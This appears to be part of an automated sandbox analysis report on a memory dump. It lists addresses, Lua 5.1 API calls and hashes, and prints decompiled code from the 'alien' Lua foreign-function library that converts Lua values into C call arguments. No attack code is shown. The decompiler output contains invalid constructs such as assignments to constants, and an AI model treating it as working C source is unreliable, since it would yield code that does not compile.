0x00000000
0x00a220ba
0x00a220ba
0x00a220bf
0x00a220c4
0x00a220c7
0x00a220c8
0x00a220c9
0x00a220ce
0x00a220d1
0x00a220d6
0x00a220d9
0x00a220db
0x00a220de
0x00000000
0x00000000
0x00a22156
0x00a2215b
0x00a22160
0x00a22163
0x00a22164
0x00a22165
0x00a2216a
0x00a2216d
0x00a22171
0x00a22174
0x00a22177
0x00a2217c
0x00a2217f
0x00a22182
0x00a22185
0x00a22188
0x00a2218b
0x00a2218d
0x00a22190
0x00000000
0x00000000
0x00000000
0x00000000
0x00a22228
0x00a2222d
0x00a22232
0x00a22235
0x00a22236
0x00a22237
0x00a2223c
0x00a2223f
0x00a22242
0x00a22244
0x00a22247
0x00000000
0x00000000
0x00a2224f
0x00a22254
0x00a22259
0x00a2225c
0x00a2225d
0x00a2225e
0x00a22263
0x00a22266
0x00a22269
0x00a2226b
0x00a2226e
0x00000000
0x00000000
0x00a221da
0x00a221df
0x00a221e4
0x00a221e7
0x00a221e8
0x00a221e9
0x00a221ee
0x00a221f1
0x00a221f3
0x00a221f6
0x00a221f9
0x00000000
0x00000000
0x00a22201
0x00a22201
0x00a22206
0x00a2220b
0x00a2220e
0x00a2220f
0x00a22210
0x00a22215
0x00a22218
0x00a2221b
0x00a2221d
0x00a22220
0x00000000
0x00000000
0x00a22276
0x00a22276
0x00a2227b
0x00a22280
0x00a22283
0x00a22284
0x00a22285
0x00a2228a
0x00a2228f
0x00a22290
0x00a22291
0x00a222cd
0x00a222d2
0x00a222d7
0x00a222eb
0x00a222ed
0x00a222ee
0x00a222ef
0x00a222f4
0x00a222f7
0x00a222fa
0x00a222fc
0x00a222fe
0x00a22301
0x00a222d9
0x00a222d9
0x00a222dc
0x00a222df
0x00a222e1
0x00a222e3
0x00a222e3
0x00a22293
0x00a22293
0x00a22298
0x00a2229d
0x00a222b1
0x00a222b2
0x00a222b3
0x00a222b8
0x00a222bb
0x00a222bd
0x00a222bf
0x00a222c2
0x00a222c5
0x00a2229f
0x00a2229f
0x00a222a2
0x00a222a4
0x00a222a6
0x00a222a9
0x00a222a9
0x00a2229d
0x00000000
0x00000000
0x00a2237e
0x00a2237e
0x00a22383
0x00a22388
0x00a2238b
0x00a2238c
0x00a2238d
0x00a22392
0x00a22397
0x00a223a9
0x00a223aa
0x00a223ab
0x00a223b0
0x00a223b5
0x00a223d3
0x00a223d4
0x00a223d5
0x00a223da
0x00a223dd
0x00a223df
0x00a223e2
0x00a223e5
0x00a223b7
0x00a223b7
0x00a223b9
0x00a223ba
0x00a223bb
0x00a223c0
0x00a223c3
0x00a223c5
0x00a223c8
0x00a223cb
0x00a223cb
0x00a22399
0x00a22399
0x00a2239c
0x00a2239e
0x00a223a1
0x00a223a1
0x00000000
0x00000000
0x00a223ed
0x00a223ed
0x00a223ee
0x00a223ef
0x00a223f4
0x00a223f7
0x00a223fc
0x00a223ff
0x00a22406
0x00a2240b
0x00a2240e
0x00a22411
0x00a22413
0x00a22415
0x00a22418
0x00a2241b
0x00000000
0x00000000
0x00000000
0x00000000
0x00a2246f
0x00a2246f
0x00a22470
0x00a22471
0x00a22476
0x00a22479
0x00a2247e
0x00a22481
0x00a22488
0x00a2248d
0x00a22490
0x00a22493
0x00a22495
0x00a22497
0x00a2249a
0x00a2249d
0x00000000
0x00000000
0x00a224a2
0x00a224a2
0x00a224a3
0x00a224a4
0x00a224a9
0x00a224ac
0x00a224ae
0x00a224b6
0x00a224bb
0x00a224be
0x00a224c1
0x00a224c3
0x00a224c5
0x00a224c8
0x00a224cb
0x00000000
0x00000000
0x00a22309
0x00a22309
0x00a2230e
0x00a22313
0x00a2231b
0x00a22325
0x00a2233e
0x00a22348
0x00a2235d
0x00a22362
0x00a22363
0x00a22364
0x00a22369
0x00a2236c
0x00a2236f
0x00a22372
0x00a22374
0x00a22376
0x00a2234a
0x00a2234a
0x00a2234d
0x00a22350
0x00a22353
0x00a22355
0x00a22355
0x00a22327
0x00a22327
0x00a22329
0x00a2232c
0x00a2232f
0x00a22331
0x00a22331
0x00000000
0x00000000
0x00a22086
0x00a224fd
0x00a224fd
0x00a22500
0x00a22507
0x00a2250d
0x00a22753
0x00a22753
0x00a22758
0x00a2275a
0x00a2275a
0x00a2275f
0x00a22760
0x00a22765
0x00a22766
0x00a2276b
0x00a2276b
0x00a2276e
0x00a2278a
0x00a22790
0x00a22795
0x00a2279d
0x00a227a0
0x00a22843
0x00a22858
0x00a22859
0x00a2285a
0x00a22868
0x00000000
0x00000000
0x00000000
0x00a227a6
0x00a227a6
0x00a227af
0x00a227b5
0x00000000
0x00000000
0x00a227bb
0x00a227bb
0x00000000
0x00a227c2
0x00a227c5
0x00a227c7
0x00a227ca
0x00a227cd
0x00a227ce
0x00a227d3
0x00a227d6
0x00000000
0x00000000
0x00a227dc
0x00a227dc
0x00a227df
0x00a227e1
0x00a227e5
0x00a227e7
0x00a227e7
0x00a227ed
0x00a227f0
0x00a227f3
0x00a227f4
0x00a227f9
0x00a227fc
0x00000000
0x00000000
0x00a22818
0x00a22818
0x00a2281b
0x00a2281e
0x00a22821
0x00a22824
0x00a22827
0x00a2282a
0x00a2282b
0x00a22830
0x00a22833
0x00000000
0x00000000
0x00a22802
0x00a22802
0x00a22804
0x00a22807
0x00a2280a
0x00a2280b
0x00a22810
0x00a22813
0x00000000
0x00000000
0x00a22837
0x00a22837
0x00a2283a
0x00000000
0x00a227a6
0x00a22513
0x00a22513
0x00000000
0x00a2253b
0x00a2253b
0x00a2253e
0x00a22542
0x00a22547
0x00a2254b
0x00a22550
0x00a22554
0x00a22557
0x00a2255a
0x00a2255d
0x00a22560
0x00a22561
0x00000000
0x00000000
0x00a225bd
0x00a225bd
0x00a225c0
0x00a225c4
0x00a225c4
0x00a225c9
0x00a225cd
0x00a225d2
0x00a225d6
0x00a225d9
0x00a225dc
0x00a225df
0x00a225e2
0x00a225e3
0x00000000
0x00000000
0x00a22594
0x00a22594
0x00a22597
0x00a2259b
0x00a2259b
0x00a225a0
0x00a225a4
0x00a225a9
0x00a225ac
0x00a225af
0x00a225b2
0x00a225b3
0x00000000
0x00000000
0x00a22623
0x00a22624
0x00a22624
0x00a22628
0x00a2262b
0x00a2262f
0x00a22633
0x00a22638
0x00a2263b
0x00000000
0x00000000
0x00a2256b
0x00a2256c
0x00a2256c
0x00a22570
0x00a22573
0x00a22577
0x00a2257b
0x00a22580
0x00a22583
0x00a22586
0x00a22589
0x00a2258a
0x00000000
0x00000000
0x00a225ed
0x00a225ee
0x00a225ee
0x00a225f2
0x00a225f5
0x00a225f9
0x00a225fd
0x00a22602
0x00a22605
0x00a22608
0x00a2260a
0x00a2260c
0x00a2260c
0x00a22612
0x00a22615
0x00a22618
0x00a22619
0x00000000
0x00000000
0x00a2251a
0x00a22528
0x00a2252d
0x00a2252e
0x00a22533
0x00000000
0x00000000
0x00a226a0
0x00a226a1
0x00a226a1
0x00a226a5
0x00a226a8
0x00a226ac
0x00a226b0
0x00a226b5
0x00a226b8
0x00a226bb
0x00a226be
0x00a226bf
0x00000000
0x00000000
0x00a226c9
0x00a226c9
0x00a226cc
0x00a226d0
0x00a226d0
0x00a226d5
0x00a226d9
0x00a226de
0x00a226e1
0x00a226e4
0x00a226e7
0x00a226e8
0x00000000
0x00000000
0x00a22640
0x00a22641
0x00a22641
0x00a22645
0x00a22648
0x00a2264c
0x00a22650
0x00a22655
0x00a22659
0x00a2265c
0x00a2265f
0x00a22662
0x00a22665
0x00a22666
0x00000000
0x00000000
0x00a22670
0x00a22671
0x00a22671
0x00a22675
0x00a22678
0x00a2267c
0x00a22680
0x00a22685
0x00a22689
0x00a2268c
0x00a2268f
0x00a22692
0x00a22695
0x00a22696
0x00000000
0x00000000
0x00a226f2
0x00a226f2
0x00a226f5
0x00a226f9
0x00a226f9
0x00a22702
0x00a22707
0x00a2270f
0x00000000
0x00000000
0x00a22711
0x00a22711
0x00a22712
0x00a22713
0x00a22718
0x00000000
0x00000000
0x00a22728
0x00a22728
0x00a2272b
0x00a2272f
0x00a2272f
0x00a22738
0x00a2273d
0x00a22745
0x00a2271d
0x00a2271d
0x00a2271e
0x00a22723
0x00000000
0x00a22723
0x00a22747
0x00a22747
0x00a22748
0x00a22749
0x00a2274e
0x00000000
0x00000000
0x00a22513

APIs

lua_tonumber.LUA5.1 ref: 00A22425
lua_pushnil.LUA5.1(?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A2252E
lua_pushnumber.LUA5.1(?,?,?), ref: 00A22561
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?,?,?), ref: 00A2258A
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?), ref: 00A225B3
lua_pushnumber.LUA5.1(?,?,?,?,?), ref: 00A225E3
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?), ref: 00A22619
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A22666
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A22696
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A226BF
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A226E8
lua_pushstring.LUA5.1(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A22713
lua_pushnil.LUA5.1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A2271E
lua_pushlightuserdata.LUA5.1(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A22749
luaL_error.LUA5.1(?,alien: unknown return type (function %s),?), ref: 00A22766
lua_pushnumber.LUA5.1(?), ref: 00A227CE
lua_pushnumber.LUA5.1(?), ref: 00A227F4
lua_pushnumber.LUA5.1(?), ref: 00A2280B
lua_pushnumber.LUA5.1(?), ref: 00A2282B

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushnumber.$lua_pushnil.$L_error.lua_pushlightuserdata.lua_pushstring.lua_tonumber.
String ID:
API String ID: 2475247279-0
Opcode ID: 9a5f71ce04cb68924bf9f524836f07183ab4b4634a31d427489bea2049647cf7
Instruction ID: 78e73a36f1d89c0af6d4c02f409516fa292ddad53fd56ef061314bb982d74d84
Opcode Fuzzy Hash: 9a5f71ce04cb68924bf9f524836f07183ab4b4634a31d427489bea2049647cf7
Instruction Fuzzy Hash: 6DC192B5D04129ABCF04EF98EE82DEEBBB8FF49300F144528E441B7246D7399A15CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00A223ED, Relevance: 25.8, APIs: 17, Instructions: 320
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00A223ED(void* __edi, long long __fp0) {
				long long* __ebx;
				void* __esi;
				void* _t219;
				intOrPtr* _t223;
				signed int _t225;
				char* _t226;
				signed int _t227;
				char* _t228;
				signed int _t239;
				void* _t246;
				void* _t248;
				intOrPtr _t250;
				intOrPtr _t252;
				intOrPtr _t253;
				void* _t272;
				signed int _t273;
				void* _t274;
				void* _t276;
				signed int _t277;
				void* _t279;
				intOrPtr* _t280;
				void* _t281;
				long long _t291;

				L0:
				while(1) {
					L0:
					_t291 = __fp0;
					_t272 = __edi;
					_push(_t246);
					L00A23F68();
					_t280 = _t279 + 8;
					 *((intOrPtr*)( *((intOrPtr*)(_t277 - 0x24)))) = E00A245C0(_t219, __fp0);
					E00A246A0(4);
					_t250 =  *((intOrPtr*)(_t277 - 0x24));
					_t223 = _t280;
					 *_t223 = _t250;
					 *((intOrPtr*)( *((intOrPtr*)(_t277 - 0xc)) + __edi)) = _t223;
					 *((intOrPtr*)(_t277 - 0x24)) = _t250 + 4;
					while(1) {
						L36:
						 *((intOrPtr*)(_t277 - 0xc)) =  *((intOrPtr*)(_t277 - 0xc)) + 4;
						_t246 = _t246 + 1;
						_t116 = _t277 - 0x4c;
						 *_t116 =  *((intOrPtr*)(_t277 - 0x4c)) - 1;
						if( *_t116 == 0) {
							break;
						}
						L1:
						_t252 =  *((intOrPtr*)(_t277 - 0x14));
						_t263 =  *((intOrPtr*)(_t252 + 0x30));
						_t225 =  *( *((intOrPtr*)(_t277 - 0xc)) +  *((intOrPtr*)(_t252 + 0x30)));
						if(_t225 > 0x11) {
							L33:
							_t226 =  *(_t252 + 8);
							if(_t226 == 0) {
								_t226 = "anonymous";
							}
							_push(_t226);
							_push(_t246);
							_push("alien: parameter %i is of unknown type (function %s)");
							_push(_t275);
							L00A23F26();
							_t280 = _t280 + 0x10;
							continue;
						}
						L2:
						switch( *((intOrPtr*)(_t225 * 4 +  &M00A2287C))) {
							case 0:
								L3:
								_t244 = E00A246A0(4);
								 *((intOrPtr*)(_t277 - 8)) = _t280;
								_push(_t246);
								_push(_t275);
								L00A23F68();
								_t280 = _t280 + 8;
								_t245 = E00A245C0(_t244, _t291);
								_t262 =  *((intOrPtr*)(_t277 - 8));
								_t263 =  *((intOrPtr*)(_t277 - 0xc));
								 *_t262 = _t245;
								 *((intOrPtr*)( *((intOrPtr*)(_t277 - 0xc)) + _t272)) = _t262;
								goto L36;
							case 1:
								L6:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								asm("fnstcw word [ebp-0xe]");
								__eax =  *(__ebp - 0xe) & 0x0000ffff;
								__edx =  *(__ebp - 0xc);
								__esp = __esp + 8;
								__eax =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								 *(__ebp - 0x18) =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								__eax =  *(__ebp - 8);
								asm("fldcw word [ebp-0x18]");
								asm("fistp dword [ebp-0x18]");
								 *__eax =  *(__ebp - 0x18);
								 *(__edx + __edi) = __eax;
								asm("fldcw word [ebp-0xe]");
								goto L36;
							case 2:
								L5:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__esp = __esp + 8;
								__eax = E00A245C0(__eax, __fp0);
								__ecx =  *(__ebp - 8);
								__edx =  *(__ebp - 0xc);
								 *__ecx = __eax;
								 *(__edx + __edi) = __ecx;
								goto L36;
							case 3:
								L8:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								asm("fnstcw word [ebp-0xe]");
								__eax =  *(__ebp - 0xe) & 0x0000ffff;
								__edx =  *(__ebp - 0xc);
								__esp = __esp + 8;
								__eax =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								 *(__ebp - 0x18) =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								__eax =  *(__ebp - 8);
								asm("fldcw word [ebp-0x18]");
								asm("fistp qword [ebp-0x1c]");
								__ecx =  *(__ebp - 0x1c);
								 *__eax = __ecx;
								 *(__edx + __edi) = __eax;
								asm("fldcw word [ebp-0xe]");
								goto L36;
							case 4:
								L4:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__esp = __esp + 8;
								__eax = E00A245C0(__eax, __fp0);
								__ecx =  *(__ebp - 8);
								 *__ecx = __eax;
								__eax =  *(__ebp - 0xc);
								 *(__eax + __edi) = __ecx;
								goto L36;
							case 5:
								L7:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								asm("fnstcw word [ebp-0xe]");
								__eax =  *(__ebp - 0xe) & 0x0000ffff;
								__edx =  *(__ebp - 0xc);
								__esp = __esp + 8;
								__eax =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								 *(__ebp - 0x18) =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								__eax =  *(__ebp - 8);
								asm("fldcw word [ebp-0x18]");
								asm("fistp qword [ebp-0x1c]");
								__ecx =  *(__ebp - 0x1c);
								 *__eax = __ecx;
								 *(__edx + __edi) = __eax;
								asm("fldcw word [ebp-0xe]");
								goto L36;
							case 6:
								goto L33;
							case 7:
								L11:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__eax =  *(__ebp - 8);
								__ecx =  *(__ebp - 0xc);
								 *__eax = __fp0;
								__esp = __esp + 8;
								 *(__ecx + __edi) = __eax;
								goto L36;
							case 8:
								L12:
								8 = E00A24686(8);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__eax =  *(__ebp - 8);
								__edx =  *(__ebp - 0xc);
								 *__eax = __fp0;
								__esp = __esp + 8;
								 *(__edx + __edi) = __eax;
								goto L36;
							case 9:
								L9:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F62();
								__ecx =  *(__ebp - 8);
								 *__ecx = __al;
								__eax =  *(__ebp - 0xc);
								__esp = __esp + 8;
								 *(__eax + __edi) = __ecx;
								goto L36;
							case 0xa:
								L10:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F62();
								__ecx =  *(__ebp - 8);
								__edx =  *(__ebp - 0xc);
								 *__ecx = __al;
								__esp = __esp + 8;
								 *(__edx + __edi) = __ecx;
								goto L36;
							case 0xb:
								L13:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F50();
								__esp = __esp + 8;
								_push(__ebx);
								_push(__esi);
								if(__eax == 0) {
									L00A23F4A();
									__esp = __esp + 8;
									if(__eax != 0) {
										_push(0);
										_push(__ebx);
										_push(__esi);
										L00A23F5C();
										__edx =  *(__ebp - 8);
										__ecx =  *(__ebp - 0xc);
										 *__edx = __eax;
										__eax = __edx;
										__esp = __esp + 0xc;
										 *(__ecx + __edi) = __eax;
									} else {
										__edx =  *(__ebp - 8);
										__ecx =  *(__ebp - 0xc);
										 *__edx = __eax;
										__eax = __edx;
										 *(__ecx + __edi) = __eax;
									}
								} else {
									L00A23F4A();
									__esp = __esp + 8;
									if(__eax != 0) {
										_push(__ebx);
										_push(__esi);
										L00A23F0E();
										__ecx =  *(__ebp - 8);
										 *__ecx = __eax;
										__eax = __ecx;
										__ecx =  *(__ebp - 0xc);
										__esp = __esp + 8;
										 *(__ecx + __edi) = __eax;
									} else {
										__ecx =  *(__ebp - 8);
										 *__ecx = __eax;
										__eax = __ecx;
										__ecx =  *(__ebp - 0xc);
										 *(__ecx + __edi) = __eax;
									}
								}
								goto L36;
							case 0xc:
								L25:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F4A();
								__esp = __esp + 8;
								if(__eax != 0) {
									_push(__ebx);
									_push(__esi);
									L00A23F56();
									__esp = __esp + 8;
									if(__eax == 0) {
										_push(__ebx);
										_push(__esi);
										L00A23F0E();
										__ecx =  *(__ebp - 8);
										 *__ecx = __eax;
										__eax =  *(__ebp - 0xc);
										__esp = __esp + 8;
										 *(__eax + __edi) = __ecx;
									} else {
										_push(0);
										_push(__ebx);
										_push(__esi);
										L00A23F5C();
										__ecx =  *(__ebp - 8);
										 *__ecx = __eax;
										__eax =  *(__ebp - 0xc);
										__esp = __esp + 0xc;
										 *(__eax + __edi) = __ecx;
									}
								} else {
									__ecx =  *(__ebp - 8);
									 *__ecx = __eax;
									__eax =  *(__ebp - 0xc);
									 *(__eax + __edi) = __ecx;
								}
								goto L36;
							case 0xd:
								goto L0;
							case 0xe:
								L30:
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								asm("fnstcw word [ebp-0xe]");
								__eax =  *(__ebp - 0xe) & 0x0000ffff;
								__ecx =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								 *(__ebp - 0x18) =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								__esp = __esp + 8;
								asm("fldcw word [ebp-0x18]");
								asm("fistp qword [ebp-0x1c]");
								__eax =  *(__ebp - 0x1c);
								 *( *(__ebp - 0x28)) =  *(__ebp - 0x1c);
								__eax = 4;
								asm("fldcw word [ebp-0xe]");
								__eax = E00A246A0(4);
								__ecx =  *(__ebp - 0x28);
								__edx =  *(__ebp - 0xc);
								__eax = __esp;
								 *__eax = __ecx;
								__ecx = __ecx + 4;
								 *(__edx + __edi) = __eax;
								 *(__ebp - 0x28) = __ecx;
								goto L36;
							case 0xf:
								L31:
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__esp = __esp + 8;
								__eax = E00A245C0(__eax, __fp0);
								__ecx =  *(__ebp - 0x2c);
								 *( *(__ebp - 0x2c)) = __al;
								4 = E00A246A0(4);
								__ecx =  *(__ebp - 0x2c);
								__edx =  *(__ebp - 0xc);
								__eax = __esp;
								 *__eax = __ecx;
								__ecx = __ecx + 1;
								 *(__edx + __edi) = __eax;
								 *(__ebp - 0x2c) = __ecx;
								goto L36;
							case 0x10:
								L32:
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__eax =  *(__ebp - 0x40);
								 *( *(__ebp - 0x40)) = __fp0;
								__esp = __esp + 8;
								4 = E00A246A0(4);
								__ecx =  *(__ebp - 0x40);
								__edx =  *(__ebp - 0xc);
								__eax = __esp;
								 *__eax = __ecx;
								__ecx = __ecx + 8;
								 *(__edx + __edi) = __eax;
								 *(__ebp - 0x40) = __ecx;
								goto L36;
							case 0x11:
								L20:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								__eax = E00A21110(__eax, __ebx, __esi, "alien_callback");
								if(__eax == 0) {
									__eax = E00A21110(__eax, __ebx, __esi, "alien_function");
									if(__eax == 0) {
										_push("alien function or callback expected");
										_push(__ebx);
										_push(__esi);
										L00A23F14();
										__ecx =  *(__ebp - 8);
										__edx =  *(__ebp - 0xc);
										__esp = __esp + 0xc;
										__eax = 0;
										 *__ecx = 0;
										 *(__edx + __edi) = __ecx;
									} else {
										__eax =  *(__eax + 4);
										__ecx =  *(__ebp - 8);
										__edx =  *(__ebp - 0xc);
										 *__ecx = __eax;
										 *(__edx + __edi) = __ecx;
									}
								} else {
									__eax =  *__eax;
									__ecx =  *(__ebp - 8);
									__edx =  *(__ebp - 0xc);
									 *__ecx = __eax;
									 *(__edx + __edi) = __ecx;
								}
								goto L36;
						}
					}
					L37:
					_t253 =  *((intOrPtr*)(_t277 - 0x14));
					 *((intOrPtr*)(_t277 - 0x3c)) = 0;
					_t227 =  *(_t253 + 0xc);
					if(_t227 > 0xc) {
						L58:
						_t228 =  *(_t253 + 8);
						if(_t228 == 0) {
							_t228 = "anonymous";
						}
						_push(_t228);
						_push("alien: unknown return type (function %s)");
						_push(_t275);
						L00A23F26();
						L61:
						_t281 = _t280 + 0xc;
						L62:
						 *((intOrPtr*)(_t277 - 0x24)) =  *((intOrPtr*)(_t277 - 0x24)) +  ~( *(_t277 - 0x48)) * 4;
						 *((intOrPtr*)(_t277 - 0x2c)) =  *((intOrPtr*)(_t277 - 0x2c)) -  *((intOrPtr*)(_t277 - 0x30));
						_t273 = 0;
						 *((intOrPtr*)(_t277 - 0x28)) =  *((intOrPtr*)(_t277 - 0x28)) +  ~( *(_t277 - 0x38)) * 4;
						if( *((intOrPtr*)(_t277 - 0x44)) <= 0) {
							L72:
							_pop(_t274);
							_pop(_t276);
							_pop(_t248);
							return E00A245A4( *((intOrPtr*)(_t277 - 0x30)) +  *((intOrPtr*)(_t277 - 0x34)) +  *(_t277 - 0x38) +  *(_t277 - 0x48) + 1, _t248,  *(_t277 - 4) ^ _t277,  *(_t277 - 0x48), _t274, _t276);
						} else {
							goto L63;
						}
						do {
							L63:
							_t239 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t277 - 0x14)) + 0x30)) + _t273 * 4)) + 0xfffffff3;
							if(_t239 > 3) {
								goto L71;
							}
							L64:
							switch( *((intOrPtr*)(_t239 * 4 +  &M00A228F8))) {
								case 0:
									L65:
									asm("fild dword [ecx]");
									_t284 = _t281 - 8;
									 *_t284 = _t291;
									_push(_t275);
									L00A23F80();
									_t281 = _t284 + 0xc;
									 *((intOrPtr*)(_t277 - 0x24)) =  *((intOrPtr*)(_t277 - 0x24)) + 4;
									goto L71;
								case 1:
									L66:
									__edx =  *(__ebp - 0x28);
									__eax =  *__edx;
									asm("fild dword [edx]");
									if(__eax < 0) {
										__fp0 = __fp0 +  *0xa25878;
									}
									__esp = __esp - 8;
									 *__esp = __fp0;
									_push(__esi);
									L00A23F80();
									__esp = __esp + 0xc;
									 *(__ebp - 0x28) =  *(__ebp - 0x28) + 4;
									goto L71;
								case 2:
									L70:
									__ecx =  *(__ebp - 0x2c);
									__edx =  *__ecx;
									 *(__ebp - 0x18) = __edx;
									__esp = __esp - 8;
									asm("fild dword [ebp-0x18]");
									 *__esp = __fp0;
									_push(__esi);
									L00A23F80();
									__esp = __esp + 0xc;
									 *(__ebp - 0x2c) =  *(__ebp - 0x2c) + 1;
									goto L71;
								case 3:
									L69:
									__fp0 =  *__ebx;
									__esp = __esp - 8;
									 *__esp = __fp0;
									_push(__esi);
									L00A23F80();
									__esp = __esp + 0xc;
									__ebx = __ebx + 8;
									goto L71;
							}
							L71:
							_t273 = _t273 + 1;
						} while (_t273 <  *((intOrPtr*)(_t277 - 0x44)));
						goto L72;
					}
					L38:
					switch( *((intOrPtr*)(_t227 * 4 +  &M00A228C4))) {
						case 0:
							L40:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__edx = __ebp - 0x20;
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __ebp - 0x20, __edi, __fp0, __eax,  *(__eax + 4), __ebp - 0x20, __edi);
							__edx =  *(__ebp - 0x20);
							 *(__ebp - 0x18) = __edx;
							__esp = __esp + 8;
							asm("fild dword [ebp-0x18]");
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 1:
							L43:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t138 = __ebp - 0x20; // -28
							__edx = _t138;
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, _t138, __edi, __fp0, __eax,  *(__eax + 4), _t138, __edi);
							__edx =  *(__ebp - 0x20) & 0x0000ffff;
							 *(__ebp - 0x18) = __edx;
							__esp = __esp + 8;
							asm("fild dword [ebp-0x18]");
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 2:
							L42:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t135 = __ebp - 0x20; // -28
							__edx = _t135;
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), __edx, __edi); // executed
							asm("fild dword [ebp-0x20]");
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 3:
							L48:
							_t145 = __ebp - 0x20; // -28
							__eax = _t145;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t145, __edi);
							asm("fild dword [ebp-0x20]");
							__edx =  *(__ebp - 0x20);
							goto L45;
						case 4:
							L41:
							_t130 = __ebp - 0x54; // -80
							__eax = _t130;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t130, __edi);
							asm("fild dword [ebp-0x54]");
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 5:
							L44:
							_t141 = __ebp - 0x58; // -84
							__eax = _t141;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t141, __edi);
							asm("fild dword [ebp-0x58]");
							__edx =  *(__ebp - 0x58);
							L45:
							if(__edx < 0) {
								__fp0 = __fp0 +  *0xa25878;
							}
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 6:
							L39:
							E00A24130(_t246, _t263, _t272, _t291,  *((intOrPtr*)(_t277 - 0x14)) + 0x10,  *((intOrPtr*)( *((intOrPtr*)(_t277 - 0x14)) + 4)), 0, _t272);
							_push(_t275);
							L00A23F74();
							_t281 = _t280 + 0x14;
							goto L62;
						case 7:
							L51:
							_t159 = __ebp - 0x50; // -76
							__eax = _t159;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t159, __edi);
							__fp0 =  *(__ebp - 0x50);
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 8:
							L52:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t165 = __ebp - 0x60; // -92
							__edx = _t165;
